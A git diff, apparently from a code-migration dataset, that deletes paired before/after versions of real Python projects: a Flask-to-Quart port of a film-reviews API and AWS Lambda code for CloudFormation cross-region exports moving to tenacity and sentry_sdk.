@blueprint.route('/reviews/', methods=['POST']) --def add_review(): -- data = request.get_json() -+async def add_review(): -+ data = await request.get_json() - film_id = data['film_id'] - rating = int(data['rating']) -- with current_app.pool.acquire() as connection: -- with connection.cursor() as cursor: -- cursor.execute( -- """INSERT INTO review (film_id, rating) -- VALUES (%s, %s)""", -- (film_id, rating), -- ) -+ async with current_app.pool.acquire() as connection: -+ await connection.execute( -+ """INSERT INTO review (film_id, rating) -+ VALUES ($1, $2)""", -+ film_id, rating, -+ ) - return jsonify({ - 'film_id': film_id, - 'rating': rating, diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py deleted file mode 100644 index 2674208..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.source.py +++ /dev/null @@ -1,21 +0,0 @@ -from flask import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('reviews', __name__) - - -@blueprint.route('/reviews/', methods=['POST']) -def add_review(): - data = request.get_json() - film_id = data['film_id'] - rating = int(data['rating']) - with current_app.pool.acquire() as connection: - with connection.cursor() as cursor: - cursor.execute( - """INSERT INTO review (film_id, rating) - VALUES (%s, %s)""", - (film_id, rating), - ) - return jsonify({ - 'film_id': film_id, - 'rating': rating, - }) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py deleted file mode 100644 index 41d33b2..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.target.py +++ /dev/null @@ -1,20 +0,0 @@ -from quart import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('reviews', __name__) - - -@blueprint.route('/reviews/', methods=['POST']) -async def add_review(): - data = await request.get_json() - film_id = data['film_id'] - rating = int(data['rating']) - async with current_app.pool.acquire() as connection: - await connection.execute( - """INSERT INTO review (film_id, rating) - VALUES ($1, $2)""", - film_id, rating, - ) - return jsonify({ - 'film_id': film_id, - 'rating': rating, - }) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff deleted file mode 100644 index 26f52b1..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.diff +++ /dev/null @@ -1,55 +0,0 @@ -diff --git a/app/run.py b/app/run.py - index 253538aa8cd65a3ed48563c2ea4594d998286293..0a70f2bddae90da13da5bce2b77ea56355ecc5d1 100644 - --- a/app/run.py - +++ b/app/run.py -@@ -1,44 +1,21 @@ - import os - from contextlib import contextmanager - --from flask import Flask --from psycopg2.extras import RealDictCursor --from psycopg2.pool import ThreadedConnectionPool -+import asyncpg -+from quart import Quart - - from films import blueprint as films_blueprint - from reviews import blueprint as reviews_blueprint - - --class PoolWrapper: -- """Exists to provide an acquire method for easy usage. -- -- pool = PoolWrapper(...) -- with pool.acquire() as conneciton: -- connection.execute(...) -- """ -- -- def __init__(self, max_pool_size: int, *, dsn): -- self._pool = ThreadedConnectionPool( -- 1, max_pool_size, dsn=dsn, cursor_factory=RealDictCursor, -- ) -- -- @contextmanager -- def acquire(self): -- try: -- connection = self._pool.getconn() -- yield connection -- finally: -- self._pool.putconn(connection) -- -- - def create_app(): -- app = Flask(__name__) -+ app = Quart(__name__) - app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False - - @app.before_first_request -- def create_db(): -- dsn = 'host=0.0.0.0 port=5432 dbname=dvdrental user=dvdrental password=dvdrental' -- app.pool = PoolWrapper(20, dsn=dsn) #os.environ['DB_DSN']) -+ async def create_db(): -+ dsn = 'postgres://dvdrental:dvdrental@0.0.0.0:5432/dvdrental' -+ app.pool = await asyncpg.create_pool(dsn, max_size=20) #os.environ['DB_DSN']) - - app.register_blueprint(films_blueprint) - app.register_blueprint(reviews_blueprint) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py deleted file mode 100644 index 52b980b..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.source.py +++ /dev/null @@ -1,50 +0,0 @@ -import os -from contextlib import contextmanager - -from flask import Flask -from psycopg2.extras import RealDictCursor -from psycopg2.pool import ThreadedConnectionPool - -from films import blueprint as films_blueprint -from reviews import blueprint as reviews_blueprint - - -class PoolWrapper: - """Exists to provide an acquire method for easy usage. - - pool = PoolWrapper(...) - with pool.acquire() as conneciton: - connection.execute(...) - """ - - def __init__(self, max_pool_size: int, *, dsn): - self._pool = ThreadedConnectionPool( - 1, max_pool_size, dsn=dsn, cursor_factory=RealDictCursor, - ) - - @contextmanager - def acquire(self): - try: - connection = self._pool.getconn() - yield connection - finally: - self._pool.putconn(connection) - - -def create_app(): - app = Flask(__name__) - app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False - - @app.before_first_request - def create_db(): - dsn = 'host=0.0.0.0 port=5432 dbname=dvdrental user=dvdrental password=dvdrental' - app.pool = PoolWrapper(20, dsn=dsn) #os.environ['DB_DSN']) - - app.register_blueprint(films_blueprint) - app.register_blueprint(reviews_blueprint) - - return app - - -if __name__ == '__main__': - create_app().run() diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py deleted file mode 100644 index f96ad08..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$run.py.target.py +++ /dev/null @@ -1,27 +0,0 @@ -import os -from contextlib import contextmanager - -import asyncpg -from quart import Quart - -from films import blueprint as films_blueprint -from reviews import blueprint as reviews_blueprint - - -def create_app(): - app = Quart(__name__) - app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False - - @app.before_first_request - async def create_db(): - dsn = 'postgres://dvdrental:dvdrental@0.0.0.0:5432/dvdrental' - app.pool = await asyncpg.create_pool(dsn, max_size=20) #os.environ['DB_DSN']) - - app.register_blueprint(films_blueprint) - app.register_blueprint(reviews_blueprint) - - return app - - -if __name__ == '__main__': - create_app().run() diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff b/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff deleted file mode 100644 index 721c19d..0000000 --- a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.diff +++ /dev/null @@ -1,60 +0,0 @@ -diff --git a/importer/lambda/cross_region_importer.py b/importer/lambda/cross_region_importer.py - index 0d18181985c3ae2ce534bcb22b4ddeffd812669a..8d0ec687838ea69612d7b1236e2341198aef7937 100644 - --- a/importer/lambda/cross_region_importer.py - +++ b/importer/lambda/cross_region_importer.py -@@ -4,10 +4,10 @@ import uuid - from collections import namedtuple - - import boto3 -+import requests - from boto3.dynamodb.conditions import Key, Attr - from botocore.exceptions import ClientError --from botocore.vendored import requests --from retrying import retry -+from tenacity import retry, retry_if_exception_type, wait_random_exponential - - RESOURCE_TYPE = 'Custom::CrossRegionImporter' - SUCCESS = "SUCCESS" -@@ -103,8 +103,7 @@ def _create_new_cross_stack_references(requested_exports, importer_context, tabl - for label, export_name in requested_exports.items(): - cross_stack_ref_id = f'{physical_resource_id}|{export_name}' - print(f'Adding cross-stack ref: {cross_stack_ref_id}') -- _dynamodb_throttling_safe_operation( -- operation=cross_stack_ref_table.put_item, -+ cross_stack_ref_table.put_item( - Item={ - 'CrossStackRefId': cross_stack_ref_id, - 'ImporterStackId': importer_context.stack_id, -@@ -159,6 +158,10 @@ def _delete_cross_stack_references(exports_to_remove, importer_context, table_in - raise - - -+@retry( -+ wait=wait_random_exponential(multiplier=1, max=30), -+ retry=retry_if_exception_type(ClientError), -+) - def _get_cloudformation_exports(target_region): - cloudformation_client = boto3.client('cloudformation', region_name=target_region) - paginator = cloudformation_client.get_paginator('list_exports') -@@ -178,21 +181,6 @@ class ExportNotFoundError(Exception): - 'Export: {name} not found in exports'.format(name=name)) - - --def _retry_if_throttled(exception): -- throttling_exceptions = ('ProvisionedThroughputExceededException', 'ThrottlingException') -- should_retry = exception.response['Error']['Code'] in throttling_exceptions -- -- if should_retry: -- print('CrossStackRefTable state table is busy, retrying...') -- -- return should_retry -- -- --@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=5000, retry_on_exception=_retry_if_throttled) --def _dynamodb_throttling_safe_operation(operation, **kwargs): -- operation(**kwargs) -- -- - def send(event, context, response_status, response_data, physical_resource_id, reason=None): - response_url = event['ResponseURL'] - diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py b/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py deleted file mode 100644 index ad35315..0000000 --- a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.source.py +++ /dev/null @@ -1,221 +0,0 @@ -import json -import os -import uuid -from collections import namedtuple - -import boto3 -from boto3.dynamodb.conditions import Key, Attr -from botocore.exceptions import ClientError -from botocore.vendored import requests -from retrying import retry - -RESOURCE_TYPE = 'Custom::CrossRegionImporter' -SUCCESS = "SUCCESS" -FAILED = "FAILED" -FAILED_PHYSICAL_RESOURCE_ID = "FAILED_PHYSICAL_RESOURCE_ID" - -ImporterContext = namedtuple( - 'ImporterContext', - [ - 'stack_id', - 'logical_resource_id', - ] -) - - -class TableInfo(object): - def __init__(self, table_arn): - self.table_name = table_arn.split('/')[1] - self.target_region = table_arn.split(':')[3] - - -def lambda_handler(event, context): - try: - _lambda_handler(event, context) - except Exception as e: - send( - event, - context, - response_status=FAILED if event['RequestType'] != 'Delete' else SUCCESS, - # Do not fail on delete to avoid rollback failure - response_data=None, - physical_resource_id=event.get('PhysicalResourceId', FAILED_PHYSICAL_RESOURCE_ID), - reason=str(e) - ) - raise - - -def _lambda_handler(event, context): - print("Received event: " + json.dumps(event)) - - resource_type = event['ResourceType'] - if resource_type != RESOURCE_TYPE: - raise ValueError(f'Unexpected resource_type: {resource_type}. Use "{RESOURCE_TYPE}"') - - request_type = event['RequestType'] - physical_resource_id = None - resource_properties = event['ResourceProperties'] - requested_exports = resource_properties.get('Exports', {}) - - importer_context = ImporterContext(stack_id=event['StackId'], logical_resource_id=event['LogicalResourceId']) - table_info = TableInfo(os.environ['CROSS_STACK_REF_TABLE_ARN']) - - response_data = {} - - if request_type in ['Create', 'Update']: - physical_resource_id = str(uuid.uuid4()) - response_data = _create_new_cross_stack_references( - requested_exports, - importer_context, - table_info, - physical_resource_id - ) - - elif request_type == 'Delete': - physical_resource_id = event['PhysicalResourceId'] - _delete_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id) - - else: - print('Request type is {request_type}, doing nothing.'.format(request_type=request_type)) - - send( - event, - context, - response_status=SUCCESS, - response_data=response_data, - physical_resource_id=physical_resource_id, - ) - - -def _create_new_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id): - exports = _get_cloudformation_exports(table_info.target_region) - - try: - response_data = { - label: exports[export_name]['Value'] for label, export_name in requested_exports.items() - } - except KeyError as e: - raise ExportNotFoundError(e.args[0]) - - dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region) - cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name) - - for label, export_name in requested_exports.items(): - cross_stack_ref_id = f'{physical_resource_id}|{export_name}' - print(f'Adding cross-stack ref: {cross_stack_ref_id}') - _dynamodb_throttling_safe_operation( - operation=cross_stack_ref_table.put_item, - Item={ - 'CrossStackRefId': cross_stack_ref_id, - 'ImporterStackId': importer_context.stack_id, - 'ImporterLogicalResourceId': importer_context.logical_resource_id, - 'ImporterLabel': label, - 'ExporterStackId': exports[export_name]['ExportingStackId'], - 'ExportName': export_name, - } - ) - - return response_data - - -def _delete_cross_stack_references(exports_to_remove, importer_context, table_info, physical_resource_id): - dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region) - cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name) - - for label, export_name in exports_to_remove.items(): - cross_stack_ref_id = f'{physical_resource_id}|{export_name}' - print(f'Removing cross-stack ref: {cross_stack_ref_id}') - try: - cross_stack_ref_table.delete_item( - Key={'CrossStackRefId': cross_stack_ref_id}, - ConditionExpression=Attr('CrossStackRefId').eq(cross_stack_ref_id), - ) - except ClientError as e: - if 'The conditional request failed' in str(e): - print(f'{cross_stack_ref_id} was not found, scanning to get the key name') - scan_response = cross_stack_ref_table.scan( - FilterExpression= - Key('ExportName').eq(export_name) & - Key('ImporterStackId').eq(importer_context.stack_id) & - Key('ImporterLabel').eq(label) & - Key('ImporterLogicalResourceId').eq(importer_context.logical_resource_id) - ) - cross_stack_ref_ids = [ - cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items'] - if cross_ref_id != cross_stack_ref_id - ] - - while scan_response.get('LastEvaluatedKey'): # This loop manage pagination of results - scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey']) - cross_stack_ref_ids.extend([cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items']]) - - for ref_id in cross_stack_ref_ids: - print(f'Deleting {ref_id}') - cross_stack_ref_table.delete_item( - Key={'CrossStackRefId': ref_id}, - ConditionExpression=Attr('CrossStackRefId').eq(ref_id), - ) - else: - raise - - -def _get_cloudformation_exports(target_region): - cloudformation_client = boto3.client('cloudformation', region_name=target_region) - paginator = cloudformation_client.get_paginator('list_exports') - exports_page_iterator = paginator.paginate() - exports = { - export['Name']: { - 'Value': export['Value'], - 'ExportingStackId': export['ExportingStackId'], - } for page in exports_page_iterator for export in page['Exports'] - } - return exports - - -class ExportNotFoundError(Exception): - def __init__(self, name): - super(ExportNotFoundError, self).__init__( - 'Export: {name} not found in exports'.format(name=name)) - - -def _retry_if_throttled(exception): - throttling_exceptions = ('ProvisionedThroughputExceededException', 'ThrottlingException') - should_retry = exception.response['Error']['Code'] in throttling_exceptions - - if should_retry: - print('CrossStackRefTable state table is busy, retrying...') - - return should_retry - - -@retry(stop_max_attempt_number=3, wait_random_min=1000, wait_random_max=5000, retry_on_exception=_retry_if_throttled) -def _dynamodb_throttling_safe_operation(operation, **kwargs): - operation(**kwargs) - - -def send(event, context, response_status, response_data, physical_resource_id, reason=None): - response_url = event['ResponseURL'] - - response_body = { - 'Status': response_status, - 'Reason': str(reason) if reason else 'See the details in CloudWatch Log Stream: ' + context.log_stream_name, - 'PhysicalResourceId': physical_resource_id, - 'StackId': event['StackId'], - 'RequestId': event['RequestId'], - 'LogicalResourceId': event['LogicalResourceId'], - 'Data': response_data, - } - - json_response_body = json.dumps(response_body) - print("Response data: " + json_response_body) - - headers = { - 'content-type': '', - 'content-length': str(len(json_response_body)) - } - - requests.put( - response_url, - data=json_response_body, - headers=headers - ) diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py b/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py deleted file mode 100644 index 3ea1916..0000000 --- a/v1/data/codefile/pokainc@cfn-cross-region-export__8d0ec68__importer$lambda$cross_region_importer.py.target.py +++ /dev/null @@ -1,209 +0,0 @@ -import json -import os -import uuid -from collections import namedtuple - -import boto3 -import requests -from boto3.dynamodb.conditions import Key, Attr -from botocore.exceptions import ClientError -from tenacity import retry, retry_if_exception_type, wait_random_exponential - -RESOURCE_TYPE = 'Custom::CrossRegionImporter' -SUCCESS = "SUCCESS" -FAILED = "FAILED" -FAILED_PHYSICAL_RESOURCE_ID = "FAILED_PHYSICAL_RESOURCE_ID" - -ImporterContext = namedtuple( - 'ImporterContext', - [ - 'stack_id', - 'logical_resource_id', - ] -) - - -class TableInfo(object): - def __init__(self, table_arn): - self.table_name = table_arn.split('/')[1] - self.target_region = table_arn.split(':')[3] - - -def lambda_handler(event, context): - try: - _lambda_handler(event, context) - except Exception as e: - send( - event, - context, - response_status=FAILED if event['RequestType'] != 'Delete' else SUCCESS, - # Do not fail on delete to avoid rollback failure - response_data=None, - physical_resource_id=event.get('PhysicalResourceId', FAILED_PHYSICAL_RESOURCE_ID), - reason=str(e) - ) - raise - - -def _lambda_handler(event, context): - print("Received event: " + json.dumps(event)) - - resource_type = event['ResourceType'] - if resource_type != RESOURCE_TYPE: - raise ValueError(f'Unexpected resource_type: {resource_type}. Use "{RESOURCE_TYPE}"') - - request_type = event['RequestType'] - physical_resource_id = None - resource_properties = event['ResourceProperties'] - requested_exports = resource_properties.get('Exports', {}) - - importer_context = ImporterContext(stack_id=event['StackId'], logical_resource_id=event['LogicalResourceId']) - table_info = TableInfo(os.environ['CROSS_STACK_REF_TABLE_ARN']) - - response_data = {} - - if request_type in ['Create', 'Update']: - physical_resource_id = str(uuid.uuid4()) - response_data = _create_new_cross_stack_references( - requested_exports, - importer_context, - table_info, - physical_resource_id - ) - - elif request_type == 'Delete': - physical_resource_id = event['PhysicalResourceId'] - _delete_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id) - - else: - print('Request type is {request_type}, doing nothing.'.format(request_type=request_type)) - - send( - event, - context, - response_status=SUCCESS, - response_data=response_data, - physical_resource_id=physical_resource_id, - ) - - -def _create_new_cross_stack_references(requested_exports, importer_context, table_info, physical_resource_id): - exports = _get_cloudformation_exports(table_info.target_region) - - try: - response_data = { - label: exports[export_name]['Value'] for label, export_name in requested_exports.items() - } - except KeyError as e: - raise ExportNotFoundError(e.args[0]) - - dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region) - cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name) - - for label, export_name in requested_exports.items(): - cross_stack_ref_id = f'{physical_resource_id}|{export_name}' - print(f'Adding cross-stack ref: {cross_stack_ref_id}') - cross_stack_ref_table.put_item( - Item={ - 'CrossStackRefId': cross_stack_ref_id, - 'ImporterStackId': importer_context.stack_id, - 'ImporterLogicalResourceId': importer_context.logical_resource_id, - 'ImporterLabel': label, - 'ExporterStackId': exports[export_name]['ExportingStackId'], - 'ExportName': export_name, - } - ) - - return response_data - - -def _delete_cross_stack_references(exports_to_remove, importer_context, table_info, physical_resource_id): - dynamodb_resource = boto3.resource('dynamodb', region_name=table_info.target_region) - cross_stack_ref_table = dynamodb_resource.Table(table_info.table_name) - - for label, export_name in exports_to_remove.items(): - cross_stack_ref_id = f'{physical_resource_id}|{export_name}' - print(f'Removing cross-stack ref: {cross_stack_ref_id}') - try: - cross_stack_ref_table.delete_item( - Key={'CrossStackRefId': cross_stack_ref_id}, - ConditionExpression=Attr('CrossStackRefId').eq(cross_stack_ref_id), - ) - except ClientError as e: - if 'The conditional request failed' in str(e): - print(f'{cross_stack_ref_id} was not found, scanning to get the key name') - scan_response = cross_stack_ref_table.scan( - FilterExpression= - Key('ExportName').eq(export_name) & - Key('ImporterStackId').eq(importer_context.stack_id) & - Key('ImporterLabel').eq(label) & - Key('ImporterLogicalResourceId').eq(importer_context.logical_resource_id) - ) - cross_stack_ref_ids = [ - cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items'] - if cross_ref_id != cross_stack_ref_id - ] - - while scan_response.get('LastEvaluatedKey'): # This loop manage pagination of results - scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey']) - cross_stack_ref_ids.extend([cross_ref_id['CrossStackRefId'] for cross_ref_id in scan_response['Items']]) - - for ref_id in cross_stack_ref_ids: - print(f'Deleting {ref_id}') - cross_stack_ref_table.delete_item( - Key={'CrossStackRefId': ref_id}, - ConditionExpression=Attr('CrossStackRefId').eq(ref_id), - ) - else: - raise - - -@retry( - wait=wait_random_exponential(multiplier=1, max=30), - retry=retry_if_exception_type(ClientError), -) -def _get_cloudformation_exports(target_region): - cloudformation_client = boto3.client('cloudformation', region_name=target_region) - paginator = cloudformation_client.get_paginator('list_exports') - exports_page_iterator = paginator.paginate() - exports = { - export['Name']: { - 'Value': export['Value'], - 'ExportingStackId': export['ExportingStackId'], - } for page in exports_page_iterator for export in page['Exports'] - } - return exports - - -class ExportNotFoundError(Exception): - def __init__(self, name): - super(ExportNotFoundError, self).__init__( - 'Export: {name} not found in exports'.format(name=name)) - - -def send(event, context, response_status, response_data, physical_resource_id, reason=None): - response_url = event['ResponseURL'] - - response_body = { - 'Status': response_status, - 'Reason': str(reason) if reason else 'See the details in CloudWatch Log Stream: ' + context.log_stream_name, - 'PhysicalResourceId': physical_resource_id, - 'StackId': event['StackId'], - 'RequestId': event['RequestId'], - 'LogicalResourceId': event['LogicalResourceId'], - 'Data': response_data, - } - - json_response_body = json.dumps(response_body) - print("Response data: " + json_response_body) - - headers = { - 'content-type': '', - 'content-length': str(len(json_response_body)) - } - - requests.put( - response_url, - data=json_response_body, - headers=headers - ) diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff b/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff deleted file mode 100644 index ee6eaa2..0000000 --- a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.diff +++ /dev/null @@ -1,210 +0,0 @@ -diff --git a/exporter/lambda/cross_region_import_replication.py b/exporter/lambda/cross_region_import_replication.py - index 59f1fecb2a7fba013a636a775c51471d2afd793b..f1120d34c2a71686e769995300ac7cf09f858e34 100644 - --- a/exporter/lambda/cross_region_import_replication.py - +++ b/exporter/lambda/cross_region_import_replication.py -@@ -5,92 +5,73 @@ from uuid import uuid4 - - import boto3 - import botocore --from raven import Client --from raven.transport import HTTPTransport -+import sentry_sdk -+from sentry_sdk.integrations.aws_lambda import AwsLambdaIntegration - --MAX_RESOURCES_PER_TEMPLATE = 200 --RESSOURCE_BY_GROUP = 5 -+sentry_sdk.init(integrations=[AwsLambdaIntegration(timeout_warning=True)]) -+ -+MAX_OUTPUTS_PER_TEMPLATE = 200 - - - def lambda_handler(*_): - try: - _lambda_handler() - except: -- # Using a the default transport does not work in a Lambda function. -- # Must use the HTTPTransport. -- Client( -- dsn=os.environ['SENTRY_DSN'], -- environment=os.environ['SENTRY_ENVIRONMENT'], -- transport=HTTPTransport -- ).captureException() -- # Must raise, otherwise the Lambda will be marked as successful, and the exception -- # will not be logged to CloudWatch logs. - raise - - - def _lambda_handler(): -- dynamodb_resource = boto3.resource('dynamodb') -- cross_stack_ref_table = dynamodb_resource.Table(os.environ['CROSS_STACK_REF_TABLE_NAME']) -+ dynamodb_resource = boto3.resource("dynamodb") -+ cross_stack_ref_table = dynamodb_resource.Table(os.environ["CROSS_STACK_REF_TABLE_NAME"]) - - scan_response = cross_stack_ref_table.scan() -- cross_stack_references = scan_response['Items'] -+ cross_stack_references = scan_response["Items"] - -- while scan_response.get('LastEvaluatedKey'): -- scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey']) -- cross_stack_references.extend(scan_response['Items']) -+ while scan_response.get("LastEvaluatedKey"): -+ scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response["LastEvaluatedKey"]) -+ cross_stack_references.extend(scan_response["Items"]) - - if cross_stack_references: -- number_of_chunk = len(cross_stack_references) / MAX_RESOURCES_PER_TEMPLATE -- max_group_size = int(max(min(RESSOURCE_BY_GROUP/number_of_chunk, RESSOURCE_BY_GROUP), 1)) -- - nested_template_urls = [] -- for items in _chunks(cross_stack_references, MAX_RESOURCES_PER_TEMPLATE): -- nested_template_urls.append(_generate_nested_template(items, max_group_size)) -+ for items in _chunks(cross_stack_references, MAX_OUTPUTS_PER_TEMPLATE): -+ nested_template_urls.append(_generate_nested_template(items)) - - master_template_resources = {} - for i, url in enumerate(nested_template_urls): -- master_template_resources[f"ParameterChunk{i}"] = { -- "Type": "AWS::CloudFormation::Stack", -- "Properties": { -- "TemplateURL": url -- } -- } -+ master_template_resources[f"Chunk{i}"] = {"Type": "AWS::CloudFormation::Stack", "Properties": {"TemplateURL": url}} - else: - master_template_resources = { -- 'PlaceHolderParameter': { -- 'Type': 'AWS::SSM::Parameter', -- 'Properties': { -- 'Value': {'Ref': "AWS::StackName"}, -- 'Type': 'String' -- }, -+ "PlaceHolderResource": { -+ "Type": "AWS::CloudFormation::WaitConditionHandle", -+ "Properties": {}, - } - } - - master_template = { -- 'AWSTemplateFormatVersion': '2010-09-09', -- 'Description': 'Auto-generated templates to simulate the standard importation behaviour on other regions', -- 'Resources': master_template_resources -+ "AWSTemplateFormatVersion": "2010-09-09", -+ "Description": "Auto-generated templates to simulate the standard importation behaviour on other regions", -+ "Resources": master_template_resources, - } - -- cloudformation_client = boto3.client('cloudformation') -+ cloudformation_client = boto3.client("cloudformation") - -- _upload_template(os.environ['GENERATED_STACK_NAME'], json.dumps(master_template)) -- template_url = _build_unsigned_url(os.environ['GENERATED_STACK_NAME']) -+ _upload_template(os.environ["GENERATED_STACK_NAME"], json.dumps(master_template)) -+ template_url = _build_unsigned_url(os.environ["GENERATED_STACK_NAME"]) - - try: - cloudformation_client.update_stack( -- StackName=os.environ['GENERATED_STACK_NAME'], -+ StackName=os.environ["GENERATED_STACK_NAME"], - TemplateURL=template_url, - ) - except botocore.exceptions.ClientError as e: -- message = e.response['Error']['Message'] -- if 'does not exist' in message: -+ message = e.response["Error"]["Message"] -+ if "does not exist" in message: - cloudformation_client.create_stack( -- StackName=os.environ['GENERATED_STACK_NAME'], -+ StackName=os.environ["GENERATED_STACK_NAME"], - TemplateURL=template_url, - ) -- elif 'No updates are to be performed.' in message: -- print('No updates are to be performed.') -+ elif "No updates are to be performed." in message: -+ print("No updates are to be performed.") - else: - raise - -@@ -100,63 +81,46 @@ def _generate_hash(string_to_hash): - - - def _upload_template(template_name, template_content): -- s3_resource = boto3.resource('s3') -- template_object = s3_resource.Object(os.environ['TEMPLATE_BUCKET'], template_name) -+ s3_resource = boto3.resource("s3") -+ template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name) - template_object.put(Body=template_content.encode()) - - - def _build_unsigned_url(template_name): -- s3_resource = boto3.resource('s3') -- template_object = s3_resource.Object( -- os.environ['TEMPLATE_BUCKET'], -- template_name -- ) -+ s3_resource = boto3.resource("s3") -+ template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name) - -- return '{host}/{bucket}/{key}'.format( -+ return "{host}/{bucket}/{key}".format( - host=template_object.meta.client.meta.endpoint_url, - bucket=template_object.bucket_name, - key=template_object.key, - ) - - --def _generate_nested_template(cross_stack_references, max_group_size): -- last_ref_id = None -- ssm_resources = {} -- resource_count = 0 -+def _generate_nested_template(cross_stack_references): -+ template = { -+ "AWSTemplateFormatVersion": "2010-09-09", -+ "Resources": { -+ "PlaceHolderResource": {"Type": "AWS::CloudFormation::WaitConditionHandle", "Properties": {}}, -+ }, -+ "Outputs": {}, -+ } - - for ref in cross_stack_references: -- ref_id = _generate_hash(ref['CrossStackRefId']) -- ssm_resource = { -- 'Type': 'AWS::SSM::Parameter', -- 'Properties': { -- 'Name': {'Fn::Sub': "${AWS::StackName}." + ref_id}, -- 'Description': f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}', -- 'Value': {'Fn::ImportValue': ref['ExportName']}, -- 'Type': 'String' -- }, -+ ref_id = _generate_hash(ref["CrossStackRefId"]) -+ output = { -+ "Value": {"Fn::ImportValue": ref["ExportName"]}, -+ "Description": f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}', - } - -- if last_ref_id: -- ssm_resource['DependsOn'] = last_ref_id # Required to prevent SSM throttling exceptions -- -- ssm_resources[ref_id] = ssm_resource -- -- if resource_count % max_group_size == 0: -- last_ref_id = ref_id -- -- resource_count += 1 -- -- imports_replication_template = { -- 'AWSTemplateFormatVersion': '2010-09-09', -- 'Resources': ssm_resources -- } -+ template["Outputs"][ref_id] = output - - template_name = f'{os.environ["GENERATED_STACK_NAME"]}.{uuid4()}' - -- _upload_template(template_name, json.dumps(imports_replication_template)) -+ _upload_template(template_name, json.dumps(template)) - return _build_unsigned_url(template_name) - - - def _chunks(l, n): - for i in range(0, len(l), n): -- yield l[i:i + n] -+ yield l[i : i + n] diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py b/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py deleted file mode 100644 index 89a70ee..0000000 --- a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.source.py +++ /dev/null @@ -1,162 +0,0 @@ -import hashlib -import json -import os -from uuid import uuid4 - -import boto3 -import botocore -from raven import Client -from raven.transport import HTTPTransport - -MAX_RESOURCES_PER_TEMPLATE = 200 -RESSOURCE_BY_GROUP = 5 - - -def lambda_handler(*_): - try: - _lambda_handler() - except: - # Using a the default transport does not work in a Lambda function. - # Must use the HTTPTransport. - Client( - dsn=os.environ['SENTRY_DSN'], - environment=os.environ['SENTRY_ENVIRONMENT'], - transport=HTTPTransport - ).captureException() - # Must raise, otherwise the Lambda will be marked as successful, and the exception - # will not be logged to CloudWatch logs. - raise - - -def _lambda_handler(): - dynamodb_resource = boto3.resource('dynamodb') - cross_stack_ref_table = dynamodb_resource.Table(os.environ['CROSS_STACK_REF_TABLE_NAME']) - - scan_response = 